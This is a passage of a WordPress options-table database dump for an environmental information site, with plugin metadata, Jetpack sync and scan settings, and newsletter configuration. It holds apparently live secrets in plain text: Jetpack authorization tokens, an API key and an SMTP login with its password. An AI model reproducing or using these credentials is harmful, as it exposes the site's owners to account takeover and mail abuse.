lugin/bit-social.1.0.7.zip\";s:5:\"1.0.8\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.0.8.zip\";s:5:\"1.0.9\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.0.9.zip\";s:5:\"1.1.2\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.1.2.zip\";s:5:\"1.1.3\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.1.3.zip\";s:5:\"1.1.4\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.1.4.zip\";s:5:\"1.1.5\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.1.5.zip\";s:5:\"1.1.6\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.1.6.zip\";s:5:\"1.1.7\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.1.7.zip\";s:5:\"1.1.8\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.1.8.zip\";s:5:\"1.1.9\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.1.9.zip\";s:6:\"1.10.0\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.10.0.zip\";s:6:\"1.11.0\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.11.0.zip\";s:6:\"1.12.0\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.12.0.zip\";s:6:\"1.12.1\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.12.1.zip\";s:8:\"1.13.0.1\";s:62:\"https://downloads.wordpress.org/plugin/bit-social.1.13.0.1.zip\";s:6:\"1.13.1\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.13.1.zip\";s:7:\"1.13.10\";s:61:\"https://downloads.wordpress.org/plugin/bit-social.1.13.10.zip\";s:6:\"1.13.2\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.13.2.zip\";s:6:\"1.13.3\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.13.3.zip\";s:6:\"1.13.4\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.13.4.zip\";s:6:\"1.13.5\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.13.5.zip\";s:6:\"1.13.6\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.13.6.zip\";s:6:\"1.13.7\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.13.7.zip\";s:6:\"1.13.9\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.13.9.zip\";s:5:\"1.2.0\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.2.0.zip\";s:5:\"1.2.1\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.2.1.zip\";s:5:\"1.2.2\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.2.2.zip\";s:5:\"1.2.3\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.2.3.zip\";s:5:\"1.2.5\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.2.5.zip\";s:5:\"1.2.6\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.2.6.zip\";s:5:\"1.2.7\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.2.7.zip\";s:5:\"1.2.8\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.2.8.zip\";s:5:\"1.2.9\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.2.9.zip\";s:5:\"1.3.0\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.3.0.zip\";s:5:\"1.3.1\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.3.1.zip\";s:5:\"1.3.2\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.3.2.zip\";s:5:\"1.3.3\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.3.3.zip\";s:5:\"1.3.4\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.3.4.zip\";s:5:\"1.3.5\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.3.5.zip\";s:5:\"1.3.6\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.3.6.zip\";s:5:\"1.3.7\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.3.7.zip\";s:5:\"1.3.8\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.3.8.zip\";s:5:\"1.3.9\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.3.9.zip\";s:5:\"1.4.0\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.4.0.zip\";s:5:\"1.4.1\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.4.1.zip\";s:5:\"1.4.3\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.4.3.zip\";s:5:\"1.4.4\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.4.4.zip\";s:5:\"1.5.0\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.5.0.zip\";s:5:\"1.5.1\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.5.1.zip\";s:5:\"1.5.2\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.5.2.zip\";s:5:\"1.5.3\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.5.3.zip\";s:5:\"1.5.4\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.5.4.zip\";s:5:\"1.5.5\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.5.5.zip\";s:5:\"1.6.0\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.6.0.zip\";s:5:\"1.7.0\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.7.0.zip\";s:5:\"1.7.1\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.7.1.zip\";s:5:\"1.7.2\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.7.2.zip\";s:5:\"1.7.3\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.7.3.zip\";s:5:\"1.8.0\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.8.0.zip\";s:5:\"1.8.1\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.8.1.zip\";s:5:\"1.9.0\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.9.0.zip\";s:5:\"trunk\";s:53:\"https://downloads.wordpress.org/plugin/bit-social.zip\";}s:14:\"business_model\";b:0;s:14:\"repository_url\";s:0:\"\";s:22:\"commercial_support_url\";s:0:\"\";s:11:\"donate_link\";s:0:\"\";s:7:\"banners\";a:2:{s:3:\"low\";s:65:\"https://ps.w.org/bit-social/assets/banner-772x250.gif?rev=3176768\";s:4:\"high\";s:66:\"https://ps.w.org/bit-social/assets/banner-1544x500.gif?rev=3176768\";}s:5:\"icons\";a:2:{s:2:\"1x\";s:63:\"https://ps.w.org/bit-social/assets/icon-128x128.gif?rev=3176768\";s:2:\"2x\";s:63:\"https://ps.w.org/bit-social/assets/icon-256x256.gif?rev=3176768\";}s:12:\"preview_link\";s:0:\"\";s:4:\"Name\";s:53:\"Bit Social – Social Media Auto Poster and Scheduler\";}}','off'),(2189621,'jetpack_protect_status_time','1781811146','yes'),(2189703,'jetpack_sync_settings_dedicated_sync_enabled','1','on'),(2189704,'jetpack_sync_settings_sync_sender_enabled','1','yes'),(2189707,'jetpack_constants_sync_checksum','a:21:{s:7:\"ABSPATH\";i:39854153;s:17:\"ALTERNATE_WP_CRON\";i:634125391;s:16:\"ATOMIC_CLIENT_ID\";i:634125391;s:26:\"AUTOMATIC_UPDATER_DISABLED\";i:634125391;s:15:\"DISABLE_WP_CRON\";i:634125391;s:18:\"DISALLOW_FILE_EDIT\";i:634125391;s:18:\"DISALLOW_FILE_MODS\";i:634125391;s:16:\"EMPTY_TRASH_DAYS\";i:2473281379;s:9:\"FS_METHOD\";i:634125391;s:12:\"IS_PRESSABLE\";i:634125391;s:16:\"JETPACK__VERSION\";i:500082105;s:11:\"PHP_VERSION\";i:3968898512;s:19:\"WP_ACCESSIBLE_HOSTS\";i:634125391;s:19:\"WP_AUTO_UPDATE_CORE\";i:634125391;s:14:\"WP_CONTENT_DIR\";i:84560219;s:20:\"WP_CRON_LOCK_TIMEOUT\";i:3994858278;s:8:\"WP_DEBUG\";i:734881840;s:22:\"WP_HTTP_BLOCK_EXTERNAL\";i:634125391;s:19:\"WP_MAX_MEMORY_LIMIT\";i:1474498405;s:15:\"WP_MEMORY_LIMIT\";i:3065409971;s:17:\"WP_POST_REVISIONS\";i:4261170317;}','yes'),(2189708,'jetpack_sync_https_history_home_url','a:5:{i:0;s:5:\"https\";i:1;s:5:\"https\";i:2;s:5:\"https\";i:3;s:5:\"https\";i:4;s:5:\"https\";}','yes'),(2189709,'jetpack_sync_https_history_main_network_site_url','a:5:{i:0;s:5:\"https\";i:1;s:5:\"https\";i:2;s:5:\"https\";i:3;s:5:\"https\";i:4;s:5:\"https\";}','yes'),(2189710,'jetpack_sync_https_history_site_url','a:5:{i:0;s:5:\"https\";i:1;s:5:\"https\";i:2;s:5:\"https\";i:3;s:5:\"https\";i:4;s:5:\"https\";}','yes'),(2189711,'jetpack_sync_settings_full_sync_sender_enabled','1','yes'),(2189712,'jetpack_sync_settings_disable','0','yes'),(2189714,'jetpack_secrets','a:1:{s:20:\"jetpack_authorize_43\";a:3:{s:8:\"secret_1\";s:32:\"ZMEEMLH1rIJLITOWzt80AH9IMpkeryjS\";s:8:\"secret_2\";s:32:\"AlAnsvf6tUinS62UxzkNnh4FOxs4ISyd\";s:3:\"exp\";i:1771864025;}}','no'),(2189715,'jetpack_package_versions','a:6:{s:16:\"transport-helper\";s:5:\"0.1.4\";s:6:\"backup\";s:7:\"1.12.10\";s:10:\"connection\";s:6:\"1.51.7\";s:4:\"sync\";s:6:\"1.47.5\";s:6:\"search\";s:6:\"0.34.3\";s:10:\"videopress\";s:6:\"0.13.4\";}','yes'),(5616054,'_transient_jetpack_failed_update_remote_package_versions','1780897005','off'),(2189718,'jetpack_sync_settings_max_queue_size','5000','yes'),(2189719,'jetpack_sync_settings_max_queue_lag','7200','yes'),(2189721,'jetpack_sync_settings_dequeue_max_bytes','500000','yes'),(2189722,'jetpack_sync_settings_upload_max_bytes','600000','yes'),(2189723,'jetpack_sync_settings_upload_max_rows','500','yes'),(2189724,'jetpack_sync_settings_sync_wait_time','10','yes'),(2189725,'jetpack_sync_settings_sync_wait_threshold','10','yes'),(2189726,'jetpack_sync_settings_enqueue_wait_time','1','yes'),(2189727,'jetpack_sync_settings_queue_max_writes_sec','100','yes'),(2189728,'jetpack_sync_settings_post_types_blacklist','a:0:{}','yes'),(2189732,'jetpack_sync_settings_taxonomies_blacklist','a:0:{}','yes'),(2189734,'jetpack_sync_settings_render_filtered_content','0','yes'),(2189735,'jetpack_sync_settings_post_meta_whitelist','a:0:{}','yes'),(2189737,'jetpack_sync_settings_comment_meta_whitelist','a:0:{}','yes'),(2189739,'jetpack_sync_settings_max_enqueue_full_sync','100','yes'),(2189740,'jetpack_sync_settings_max_queue_size_full_sync','1000','yes'),(2189741,'jetpack_sync_settings_sync_via_cron','1','yes'),(2189742,'jetpack_sync_settings_cron_sync_time_limit','240','yes'),(2189743,'jetpack_sync_settings_known_importers','a:6:{s:16:\"Blogger_Importer\";s:7:\"blogger\";s:13:\"LJ_API_Import\";s:11:\"livejournal\";s:9:\"MT_Import\";s:2:\"mt\";s:10:\"RSS_Import\";s:3:\"rss\";s:20:\"WC_Tax_Rate_Importer\";s:12:\"woo-tax-rate\";s:9:\"WP_Import\";s:9:\"wordpress\";}','yes'),(2189744,'jetpack_sync_settings_term_relationships_full_sync_item_size','100','yes'),(2189745,'jetpack_sync_settings_full_sync_send_duration','9','yes'),(2189746,'jetpack_sync_settings_full_sync_limits','a:5:{s:8:\"comments\";a:2:{s:10:\"chunk_size\";i:100;s:10:\"max_chunks\";i:10;}s:5:\"posts\";a:2:{s:10:\"chunk_size\";i:100;s:10:\"max_chunks\";i:1;}s:18:\"term_relationships\";a:2:{s:10:\"chunk_size\";i:1000;s:10:\"max_chunks\";i:10;}s:5:\"terms\";a:2:{s:10:\"chunk_size\";i:1000;s:10:\"max_chunks\";i:10;}s:5:\"users\";a:2:{s:10:\"chunk_size\";i:100;s:10:\"max_chunks\";i:10;}}','yes'),(2189747,'jetpack_sync_settings_checksum_disable','0','yes'),(2189790,'jetpack_callables_sync_checksum','a:38:{s:11:\"get_plugins\";i:1354145852;s:10:\"get_themes\";i:1266624464;s:24:\"get_plugins_action_links\";i:571546217;s:28:\"has_file_system_write_access\";i:4261170317;s:8:\"home_url\";i:2000742130;s:16:\"hosting_provider\";i:769900095;s:12:\"is_fse_theme\";i:734881840;s:15:\"is_main_network\";i:734881840;s:13:\"is_multi_site\";i:734881840;s:21:\"is_version_controlled\";i:734881840;s:6:\"locale\";i:110763218;s:17:\"main_network_site\";i:2000742130;s:26:\"main_network_site_wpcom_id\";i:4159331838;s:14:\"paused_plugins\";i:223132457;s:13:\"paused_themes\";i:223132457;s:18:\"post_type_features\";i:1811438221;s:10:\"post_types\";i:2328213086;s:27:\"rest_api_allowed_post_types\";i:2544842423;s:32:\"rest_api_allowed_public_metadata\";i:3610467939;s:5:\"roles\";i:3494274986;s:10:\"shortcodes\";i:659872654;s:13:\"site_icon_url\";i:822570633;s:8:\"site_url\";i:2000742130;s:10:\"taxonomies\";i:2076700518;s:13:\"theme_support\";i:503731968;s:8:\"timezone\";i:3808505409;s:23:\"wp_get_environment_type\";i:1138987844;s:18:\"wp_max_upload_size\";i:2617921723;s:10:\"wp_version\";i:3089558732;s:14:\"active_modules\";i:2134560650;s:16:\"single_user_site\";i:734881840;s:7:\"updates\";i:2051231534;s:24:\"available_jetpack_blocks\";i:4023235;s:24:\"sso_is_two_step_required\";i:734881840;s:26:\"sso_should_hide_login_form\";i:734881840;s:18:\"sso_match_by_email\";i:734881840;s:21:\"sso_new_user_override\";i:734881840;s:29:\"sso_bypass_default_login_form\";i:734881840;}','no'),(2189793,'jetpack_next_sync_time_full-sync-enqueue','1670860550','yes'),(2189807,'jetpack_updates_sync_checksum','a:3:{s:14:\"update_plugins\";i:3586425197;s:13:\"update_themes\";i:254758101;s:11:\"update_core\";i:599528830;}','yes'),(2189899,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(2189906,'wordpress_api_key','544456aafd18','yes'),(2189944,'jetpack_waf_share_data','1','yes'),(2189951,'jetpack_waf_ip_list','1','yes'),(2190002,'ai1wmue_backups','0','yes'),(2190003,'ai1wmue_total','5GB','yes'),(2190004,'ai1wmue_days','30','yes'),(2190005,'ai1wm_messages','a:0:{}','yes'),(2236534,'_elementor_pro_license_data_fallback','a:2:{s:7:\"timeout\";i:1670780930;s:5:\"value\";s:42:\"{\"license\":\"valid\",\"expires\":\"01.01.2030\"}\";}','no'),(2238573,'jetpack_last_connect_url_check','1771856825','no'),(2367425,'jetpack_waf_last_updated_timestamp','1728898790','yes'),(2465401,'jetpack_sync_full_status','a:4:{s:7:\"started\";i:1670860543;s:8:\"finished\";i:1670860549;s:8:\"progress\";a:5:{s:7:\"options\";a:1:{s:8:\"finished\";b:1;}s:9:\"functions\";a:1:{s:8:\"finished\";b:1;}s:9:\"constants\";a:1:{s:8:\"finished\";b:1;}s:5:\"users\";a:4:{s:5:\"total\";s:1:\"1\";s:4:\"sent\";i:1;s:8:\"finished\";b:1;s:9:\"last_sent\";s:2:\"42\";}s:15:\"network_options\";a:1:{s:8:\"finished\";b:1;}}s:6:\"config\";a:5:{s:7:\"options\";b:1;s:9:\"functions\";b:1;s:9:\"constants\";b:1;s:5:\"users\";a:1:{i:0;i:42;}s:15:\"network_options\";b:1;}}','no'),(2465406,'jp_sync_error_log_immediate-send','a:2:{s:15:\"1670860547.3193\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;s:53:\"There is another request running for the same blog ID\";}}s:10:\"error_data\";a:1:{s:24:\"concurrent_request_error\";i:400;}s:18:\"\0*\0additional_data\";a:0:{}}s:14:\"1670860548.178\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;s:53:\"There is another request running for the same blog ID\";}}s:10:\"error_data\";a:1:{s:24:\"concurrent_request_error\";i:400;}s:18:\"\0*\0additional_data\";a:0:{}}}','yes'),(2465428,'jetpack_scan_status','s:5310:\"O:8:\"stdClass\":5:{s:5:\"state\";s:4:\"idle\";s:7:\"threats\";a:4:{i:0;O:8:\"stdClass\":15:{s:2:\"id\";i:111075187;s:9:\"signature\";s:23:\"Vulnerable.WP.Extension\";s:5:\"title\";s:48:\"Vulnerable Plugin: elementor-pro (version 3.7.7)\";s:11:\"description\";s:68:\"The plugin elementor-pro (version 3.7.7) has a known vulnerability. \";s:25:\"vulnerability_description\";s:29:\"Vulnerability found in plugin\";s:15:\"fix_description\";s:56:\"Jetpack Scan will delete the affected file or directory.\";s:16:\"payload_subtitle\";N;s:19:\"payload_description\";N;s:14:\"first_detected\";s:24:\"2023-09-14T07:28:23.000Z\";s:8:\"severity\";i:4;s:5:\"fixer\";O:8:\"stdClass\":3:{s:5:\"fixer\";s:6:\"delete\";s:4:\"file\";s:32:\"wp-content/plugins/elementor-pro\";s:15:\"extensionStatus\";s:6:\"active\";}s:6:\"status\";s:7:\"current\";s:7:\"fixable\";O:8:\"stdClass\":3:{s:5:\"fixer\";s:6:\"delete\";s:4:\"file\";s:32:\"wp-content/plugins/elementor-pro\";s:15:\"extensionStatus\";s:6:\"active\";}s:9:\"extension\";O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:13:\"elementor-pro\";s:4:\"name\";s:13:\"elementor-pro\";s:7:\"version\";s:5:\"3.7.7\";s:9:\"isPremium\";b:1;}s:6:\"source\";s:73:\"https://wpvulndb.com/vulnerabilities/73e8e030-8e8b-43de-a602-c699ab2eafaf\";}i:1;O:8:\"stdClass\":15:{s:2:\"id\";i:106432552;s:9:\"signature\";s:23:\"Vulnerable.WP.Extension\";s:5:\"title\";s:95:\"Vulnerable Plugin: Lightweight Widget Area Plugin &#8211; Content Aware Sidebars (version 3.19)\";s:11:\"description\";s:115:\"The plugin Lightweight Widget Area Plugin &#8211; Content Aware Sidebars (version 3.19) has a known vulnerability. \";s:25:\"vulnerability_description\";s:29:\"Vulnerability found in plugin\";s:15:\"fix_description\";s:53:\"Jetpack Scan will update to a newer version (3.19.1).\";s:16:\"payload_subtitle\";N;s:19:\"payload_description\";N;s:14:\"first_detected\";s:24:\"2023-08-10T08:03:40.000Z\";s:8:\"severity\";i:3;s:5:\"fixer\";O:8:\"stdClass\":3:{s:5:\"fixer\";s:6:\"update\";s:6:\"target\";s:6:\"3.19.1\";s:15:\"extensionStatus\";s:6:\"active\";}s:6:\"status\";s:7:\"current\";s:7:\"fixable\";O:8:\"stdClass\":3:{s:5:\"fixer\";s:6:\"update\";s:6:\"target\";s:6:\"3.19.1\";s:15:\"extensionStatus\";s:6:\"active\";}s:9:\"extension\";O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:22:\"content-aware-sidebars\";s:4:\"name\";s:61:\"Lightweight Widget Area Plugin &#8211; Content Aware Sidebars\";s:7:\"version\";s:4:\"3.19\";s:9:\"isPremium\";b:0;}s:6:\"source\";s:73:\"https://wpvulndb.com/vulnerabilities/58ab5352-d783-431a-b0a5-382381cc13fd\";}i:2;O:8:\"stdClass\":15:{s:2:\"id\";i:95241741;s:9:\"signature\";s:23:\"Vulnerable.WP.Extension\";s:5:\"title\";s:60:\"Vulnerable Plugin: Elementor Website Builder (version 3.7.8)\";s:11:\"description\";s:80:\"The plugin Elementor Website Builder (version 3.7.8) has a known vulnerability. \";s:25:\"vulnerability_description\";s:29:\"Vulnerability found in plugin\";s:15:\"fix_description\";s:53:\"Jetpack Scan will update to a newer version (3.16.2).\";s:16:\"payload_subtitle\";N;s:19:\"payload_description\";N;s:14:\"first_detected\";s:24:\"2023-05-03T07:28:36.000Z\";s:8:\"severity\";i:3;s:5:\"fixer\";O:8:\"stdClass\":3:{s:5:\"fixer\";s:6:\"update\";s:6:\"target\";s:6:\"3.16.2\";s:15:\"extensionStatus\";s:6:\"active\";}s:6:\"status\";s:7:\"current\";s:7:\"fixable\";O:8:\"stdClass\":3:{s:5:\"fixer\";s:6:\"update\";s:6:\"target\";s:6:\"3.16.2\";s:15:\"extensionStatus\";s:6:\"active\";}s:9:\"extension\";O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:9:\"elementor\";s:4:\"name\";s:25:\"Elementor Website Builder\";s:7:\"version\";s:5:\"3.7.8\";s:9:\"isPremium\";b:0;}s:6:\"source\";s:73:\"https://wpvulndb.com/vulnerabilities/a875836d-77f4-4306-b275-2b60efff1493\";}i:3;O:8:\"stdClass\":15:{s:2:\"id\";i:78097894;s:9:\"signature\";s:22:\"Core.File.Modification\";s:5:\"title\";s:54:\"Compromised WordPress core file: default-constants.php\";s:11:\"description\";s:108:\"Core WordPress files are not normally changed. If you did not make these changes you should review the code.\";s:25:\"vulnerability_description\";s:32:\"Vulnerability found in WordPress\";s:15:\"fix_description\";s:57:\"Jetpack Scan will replace the affected file or directory.\";s:16:\"payload_subtitle\";N;s:19:\"payload_description\";N;s:14:\"first_detected\";s:24:\"2022-10-18T09:28:56.000Z\";s:8:\"severity\";i:4;s:5:\"fixer\";O:8:\"stdClass\":3:{s:5:\"fixer\";s:7:\"replace\";s:4:\"file\";s:59:\"/home/ekmslib/public_html/wp-includes/default-constants.php\";s:15:\"extensionStatus\";s:0:\"\";}s:6:\"status\";s:7:\"current\";s:7:\"fixable\";O:8:\"stdClass\":3:{s:5:\"fixer\";s:7:\"replace\";s:4:\"file\";s:59:\"/home/ekmslib/public_html/wp-includes/default-constants.php\";s:15:\"extensionStatus\";s:0:\"\";}s:8:\"filename\";s:59:\"/home/ekmslib/public_html/wp-includes/default-constants.php\";s:4:\"diff\";s:557:\"--- /tmp/wordpress/6.0.3/wordpress/wp-includes/default-constants.php	2022-10-17 23:57:12.434944717 +0000\n+++ /home/ekmslib/public_html/wp-includes/default-constants.php	2022-10-18 09:28:55.520457589 +0000\n@@ -47,9 +47,9 @@\n 		if ( false === wp_is_ini_value_changeable( \'memory_limit\' ) ) {\n 			define( \'WP_MEMORY_LIMIT\', $current_limit );\n 		} elseif ( is_multisite() ) {\n-			define( \'WP_MEMORY_LIMIT\', \'64M\' );\n+			define( \'WP_MEMORY_LIMIT\', \'256M\' );\n 		} else {\n-			define( \'WP_MEMORY_LIMIT\', \'40M\' );\n+			define( \'WP_MEMORY_LIMIT\', \'256M\' );\n 		}\n 	}\n \n\";}}s:9:\"has_cloud\";b:1;s:11:\"credentials\";a:0:{}s:11:\"most_recent\";O:8:\"stdClass\":5:{s:10:\"is_initial\";b:0;s:9:\"timestamp\";s:25:\"2023-09-14T07:23:25+00:00\";s:8:\"duration\";i:299;s:8:\"progress\";i:100;s:5:\"error\";b:0;}}\";','yes'),(2465429,'jetpack_scan_status_timestamp','1694720770','yes'),(2621554,'wp_calendar_block_has_published_posts','1','yes'),(2621687,'jetpack_waf_needs_update','1','yes'),(2621878,'tiled_galleries','1','yes'),(2713506,'jetpack_next_sync_time_sync','1781241295','on'),(2754701,'everest_forms_uninstall_option','no','yes'),(2754702,'everest_forms_allow_usage_tracking','no','yes'),(2756692,'jetpack_waf_automatic_rules_last_updated_timestamp','1695029585','yes'),(2896520,'everest_forms_allow_usage_notice_shown','1','yes'),(3206480,'everest_forms_recaptcha_turnstile_site_key','','yes'),(3206481,'everest_forms_recaptcha_turnstile_secret_key','','yes'),(3206567,'newsletter_backup_7.0.0','a:37:{s:10:\"newsletter\";a:18:{s:14:\"noconfirmation\";s:1:\"1\";s:12:\"notify_email\";s:24:\"contact@ekmsliberia.info\";s:8:\"multiple\";s:1:\"0\";s:6:\"notify\";s:1:\"0\";s:10:\"error_text\";s:102:\"<p>You cannot subscribe with the email address you entered, please contact the site administrator.</p>\";s:17:\"subscription_text\";s:26:\"<p>{subscription_form}</p>\";s:17:\"confirmation_text\";s:104:\"<p>A confirmation email is on the way. Follow the instructions and check the spam folder. Thank you.</p>\";s:20:\"confirmation_subject\";s:32:\"Please confirm your subscription\";s:21:\"confirmation_tracking\";s:0:\"\";s:20:\"confirmation_message\";s:94:\"<p>Please confirm your subscription <a href=\"{subscription_confirm_url}\">clicking here</a></p>\";s:14:\"confirmed_text\";s:43:\"<p>Your subscription has been confirmed</p>\";s:17:\"confirmed_subject\";s:7:\"Welcome\";s:17:\"confirmed_message\";s:140:\"<p>This message confirms your subscription to our newsletter. Thank you!</p>\r\n<hr />\r\n<p><a href=\"{profile_url}\">Change your profile</a></p>\";s:18:\"confirmed_tracking\";s:0:\"\";s:14:\"optin_override\";s:1:\"0\";s:16:\"confirmation_url\";s:0:\"\";s:13:\"confirmed_url\";s:0:\"\";s:18:\"confirmed_disabled\";s:1:\"0\";}s:20:\"newsletter_dismissed\";a:1:{s:20:\"newsletter-shortcode\";i:1;}s:17:\"newsletter_emails\";a:1:{s:5:\"theme\";s:7:\"default\";}s:36:\"newsletter_emails_first_install_time\";s:10:\"1575385711\";s:31:\"newsletter_emails_theme_default\";a:0:{}s:25:\"newsletter_emails_version\";s:5:\"1.1.5\";s:23:\"newsletter_install_time\";s:10:\"1575385711\";s:20:\"newsletter_log_level\";s:1:\"0\";s:24:\"newsletter_logger_secret\";s:8:\"dc01b950\";s:15:\"newsletter_main\";a:37:{s:11:\"return_path\";b:0;s:8:\"reply_to\";b:0;s:12:\"sender_email\";s:24:\"contact@ekmsliberia.info\";s:11:\"sender_name\";s:23:\"Liberia EKMS Newsletter\";s:6:\"editor\";i:0;s:13:\"scheduler_max\";s:5:\"10000\";s:9:\"phpmailer\";i:0;s:5:\"debug\";s:1:\"0\";s:5:\"track\";s:1:\"1\";s:3:\"css\";s:0:\"\";s:12:\"css_disabled\";s:1:\"0\";s:2:\"ip\";s:0:\"\";s:4:\"page\";s:4:\"2904\";s:19:\"disable_cron_notice\";i:0;s:13:\"do_shortcodes\";s:1:\"0\";s:11:\"header_logo\";a:2:{s:2:\"id\";s:3:\"440\";s:3:\"url\";s:60:\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\";}s:12:\"header_title\";s:41:\"Environmental Knowledge Management System\";s:10:\"header_sub\";s:19:\"Republic of Liberia\";s:12:\"footer_title\";s:12:\"EKMS Liberia\";s:14:\"footer_contact\";s:37:\"4th Street, Sinkor, Monrovia, Liberia\";s:12:\"footer_legal\";s:0:\"\";s:12:\"facebook_url\";s:85:\"https://web.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";s:11:\"twitter_url\";s:31:\"https://twitter.com/ekmsliberia\";s:13:\"instagram_url\";s:0:\"\";s:13:\"pinterest_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:10:\"tumblr_url\";s:0:\"\";s:11:\"youtube_url\";s:0:\"\";s:9:\"vimeo_url\";s:0:\"\";s:14:\"soundcloud_url\";s:0:\"\";s:12:\"telegram_url\";s:0:\"\";s:6:\"vk_url\";s:0:\"\";s:14:\"googleplus_url\";s:0:\"\";s:12:\"contract_key\";s:0:\"\";s:9:\"log_level\";s:1:\"0\";s:25:\"content_transfer_encoding\";s:0:\"\";s:5:\"roles\";a:0:{}}s:34:\"newsletter_main_first_install_time\";s:10:\"1575385711\";s:20:\"newsletter_main_info\";a:18:{s:11:\"header_logo\";a:2:{s:2:\"id\";s:3:\"440\";s:3:\"url\";s:60:\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\";}s:12:\"header_title\";s:41:\"Environmental Knowledge Management System\";s:10:\"header_sub\";s:19:\"Republic of Liberia\";s:12:\"footer_title\";s:12:\"EKMS Liberia\";s:14:\"footer_contact\";s:37:\"4th Street, Sinkor, Monrovia, Liberia\";s:12:\"footer_legal\";s:0:\"\";s:12:\"facebook_url\";s:85:\"https://web.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";s:11:\"twitter_url\";s:31:\"https://twitter.com/ekmsliberia\";s:13:\"instagram_url\";s:0:\"\";s:13:\"pinterest_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:10:\"tumblr_url\";s:0:\"\";s:11:\"youtube_url\";s:0:\"\";s:9:\"vimeo_url\";s:0:\"\";s:14:\"soundcloud_url\";s:0:\"\";s:12:\"telegram_url\";s:0:\"\";s:6:\"vk_url\";s:0:\"\";s:14:\"googleplus_url\";s:0:\"\";}s:20:\"newsletter_main_smtp\";a:8:{s:7:\"enabled\";s:1:\"1\";s:4:\"host\";s:21:\"mail.ekmsliberia.info\";s:4:\"user\";s:24:\"contact@ekmsliberia.info\";s:4:\"pass\";s:12:\"aDuDwKZefil%\";s:4:\"port\";s:3:\"465\";s:6:\"secure\";s:3:\"ssl\";s:12:\"ssl_insecure\";s:1:\"0\";s:10:\"test_email\";s:0:\"\";}s:23:\"newsletter_main_version\";s:5:\"1.6.7\";s:15:\"newsletter_page\";s:4:\"2904\";s:18:\"newsletter_profile\";a:186:{s:5:\"email\";s:5:\"Email\";s:11:\"email_error\";s:28:\"Email address is not correct\";s:4:\"name\";s:23:\"First name or full name\";s:11:\"name_status\";i:2;s:10:\"name_rules\";s:1:\"0\";s:7:\"surname\";s:9:\"Last name\";s:14:\"surname_status\";s:1:\"0\";s:10:\"sex_status\";s:1:\"0\";s:3:\"sex\";s:3:\"I\'m\";s:7:\"privacy\";s:52:\"By continuing, you accept the cookies privacy 